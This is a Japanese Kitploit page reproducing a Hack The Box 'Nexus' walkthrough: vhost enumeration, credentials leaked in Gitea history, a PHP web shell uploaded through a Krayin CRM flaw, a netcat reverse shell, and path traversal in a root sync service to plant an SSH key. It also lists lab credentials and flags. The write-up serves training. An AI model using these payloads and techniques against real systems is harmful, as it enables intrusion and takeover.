Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
htb-labs-nexus — # Hack The Box Nexus マシン攻略記事:偵察、Gitea 認証情報の発見、CVE-2026-38526 を介した Krayin CRM の悪用、初期アクセス、そして脆弱な Gitea テンプレート同期サービスを介した権限昇格を網羅。 | Kitploit
ツール/GitHubGitHub/diegorivas1/htb-labs-nexus
特権昇格偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティCTFペネトレーションテスト学習と教育ラボと実践
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

# Hack The Box Nexus マシン攻略記事:偵察、Gitea 認証情報の発見、CVE-2026-38526 を介した Krayin CRM の悪用、初期アクセス、そして脆弱な Gitea テンプレート同期サービスを介した権限昇格を網羅。

8時間2分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

🏴‍☠️ HTB Labs - Nexus

English 🇺🇸 | Español 🇪🇸

English | Español

HTB Difficulty OS Platform


📋 概要

Nexus は Hack The Box の Easy 難易度の Linux マシンであり、仮想ホストの列挙、露出した認証情報、脆弱な Web アプリケーション機能、リモートコード実行、認証情報の再利用、ローカル権限昇格を含む多段階の攻撃チェーンを示しています。

攻撃チェーン

root@kitploit:~
偵察
      │
      ▼
仮想ホスト列挙
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      Gitea コミット履歴
              │
              ▼
       露出した認証情報
              │
              ▼
        Krayin CRM ログイン
              │
              ▼
      CVE-2026-38526
              │
              ▼
        PHP ウェブシェル
              │
              ▼
       リバースシェル
        (www-data)
              │
              ▼
       アプリケーション .env
              │
              ▼
        jones として SSH
              │
              ▼
   gitea-template-sync
              │
              ▼
       パストラバーサル
              │
              ▼
    悪意のある Git リポジトリ
              │
              ▼
         root として SSH

主要テクニック

  • 🔍 仮想ホスト列挙
  • 🔑 Git コミット履歴による認証情報の発見
  • 💻 Krayin CRM の悪用
  • 🐚 PHP ウェブシェルとリバースシェル
  • 🔐 認証情報の再利用
  • 🔬 Linux サービスの列挙
  • 📂 パストラバーサル
  • 🌳 悪意のある Git リポジトリの構築
  • 👑 root への権限昇格

ターゲット IP: 10.129.82.92


🔍 フェーズ 1 偵察

ポートスキャン

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

結果

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

仮想ホスト列挙

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

発見されたホスト

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

発見されたホストを /etc/hosts に追加:

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 フェーズ 2 認証情報の発見

Gitea の列挙

以下に移動:

root@kitploit:~
http://git.nexus.htb

次の名前のリポジトリ:

root@kitploit:~
admin/krayin-docker-setup

には、Git 履歴に有用な情報が含まれています。

.env ファイルは以前のコミットから復元でき、現在のバージョンには存在しない認証情報が明らかになります。

発見された認証情報

サービスユーザー名パスワード
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

メールアドレス [email protected] は、メイン Web サイトの採用情報セクションでも確認されました。


💻 フェーズ 3 CVE-2026-38526 : Krayin CRM

CRM ログイン

root@kitploit:~
URL: http://billing.nexus.htb/admin/login

Email: [email protected]
Password: N27xh!!2ucY04

ウェブシェルのアップロード

以下に移動:

root@kitploit:~
/admin/mail/sent

次に:

  1. メール作成 をクリックします。
  2. PHP ペイロードを添付します。
  3. Burp Suite を使用してリクエストをインターセプトします。
  4. アップロードされたファイル名を変更します。
  5. MIME タイプを変更します。
  6. リクエストを転送します。

ペイロードは以下に保存されています:

root@kitploit:~
exploits/CVE-2026-38526/shell.php

ペイロード:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

関連する multipart フィールドは次のとおりです:

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

ウェブシェル

アップロード成功後:

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

期待される結果:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 フェーズ 4 リバースシェル

リスナーを起動:

root@kitploit:~
nc -lvnp 4444

次に、アップロードしたウェブシェルを通じてリバースシェルをトリガーします。

Python 実装は以下で利用可能です:

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

この段階で、シェルは次のユーザーとして取得されます:

root@kitploit:~
www-data

🐚 フェーズ 5 ユーザーアクセス

アプリケーション設定の読み取り

Krayin の設定を確認:

root@kitploit:~
cat /var/www/krayin/.env

認証情報が見つかります:

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

ユーザーの列挙

root@kitploit:~
cat /etc/passwd | grep sh$

jones アカウントが特定されます。

jones として SSH

root@kitploit:~
ssh [email protected]

パスワード:

root@kitploit:~
y27xb3ha!!74GbR

ユーザーフラグ

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 フェーズ 6 権限昇格

サービスの列挙

root@kitploit:~
systemctl list-units | grep -i gitea

次のサービスとタイマーが特定されます:

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

このサービスは昇格した権限で実行されます。

脆弱なスクリプト

root@kitploit:~
/etc/gitea/template-sync.py

同期メカニズムはパス構築を使用しており、パストラバーサルを通じて悪用される可能性があります。


🎯 フェーズ 7 悪意のある Git リポジトリ

SSH キーペアを生成:

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

Git オブジェクト操作エクスプロイトは以下にあります:

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

リポジトリを作成:

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

リポジトリは次のブランチを使用する必要があります:

root@kitploit:~
main

Gitea トークン

以下から個人アクセストークンを生成:

root@kitploit:~
http://git.nexus.htb

以下に移動:

root@kitploit:~
Settings → Applications

次にリモートを設定:

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

悪意のあるリポジトリをプッシュ:

root@kitploit:~
git push -f origin main

⏰ フェーズ 8 テンプレート同期

同期ログを監視:

root@kitploit:~
tail -f /var/log/template-sync.log

同期が成功すると、悪意のある Git ツリーが特権サービスによって処理されます。

例:

root@kitploit:~
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30]   synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete

👑 フェーズ 9 Root

SSH 公開鍵が root アカウントに書き込まれたら:

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

アクセスを確認:

root@kitploit:~
whoami

期待される結果:

root@kitploit:~
root

root フラグを取得:

root@kitploit:~
cat /root/root.txt

Root フラグ

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 フラグ

フラグ値
Userf20cbf9aeb6bb228d356a42ff49c1933
Root85be1d2a3084e387da0e7dd118908c63

🔐 認証情報

これらの認証情報は、このリポジトリで文書化されている Hack The Box ラボ環境に属するものです。


🛠️ ツール


📁 リポジトリ構造

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

📚 追加リソース

  • CVE-2026-38526
  • Krayin CRM
  • Gitea Documentation
  • OWASP Path Traversal

⚠️ 免責事項

このリポジトリは教育目的および許可されたセキュリティテストのみを対象としています。

ここで文書化されているテクニック、認証情報、エクスプロイト、コマンドは、明示的な許可なしにシステムに対して使用してはなりません。


🎯 重要なポイント

  1. 🔍 仮想ホストを列挙する: 重要なサービスがサブドメインの背後に隠れている場合があります。
  2. 🔑 Git 履歴を確認する: ファイルからシークレットを削除しても、リポジトリ履歴から消えたわけではありません。
  3. 💻 ファイルアップロードを分析する: 拡張子と MIME タイプの検証は、重要なセキュリティ制御になり得ます。
  4. 🐚 シェル取得後に列挙する: 設定ファイルに再利用可能な認証情報が含まれている場合があります。
  5. 🔬 特権サービスを確認する: root として実行されるサービスは、権限昇格のベクトルになり得ます。
  6. 📂 ファイルパスを適切に検証する: ユーザー制御のパスの安全でない処理は、パストラバーサル脆弱性を引き起こす可能性があります。
  7. 🌳 Git は攻撃ベクトルになり得る: アプリケーションが Git オブジェクトとツリーの構造を誤って信頼する場合、それらを操作できます。

🙏 クレジット

  • Hack The Box : マシンおよびラボプラットフォーム
  • P3lured : 元の write-up
  • Tran Manh Tan : 補足ガイド

⭐ この write-up が役に立った場合は、リポジトリにスターを付けることを検討してください。

ツールをダウンロード
サービスユーザー名パスワード / キー
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04
Gitea Tokenjones1dd7105bf7e57cad02c5a56af5d92703a7839364
SSHjonesy27xb3ha!!74GbR
SSH Rootroot/tmp/nexus_root
ツール目的
Nmapポートおよびサービスの列挙
Gobuster仮想ホストの列挙
Burp SuiteHTTP リクエストのインターセプトと変更
Gitリポジトリの分析と悪意のあるリポジトリの構築
Python 3エクスプロイトスクリプト
Netcatリバースシェルリスナー
LinEnumLinux の列挙
LinPEAS権限昇格の列挙
SSHリモートアクセス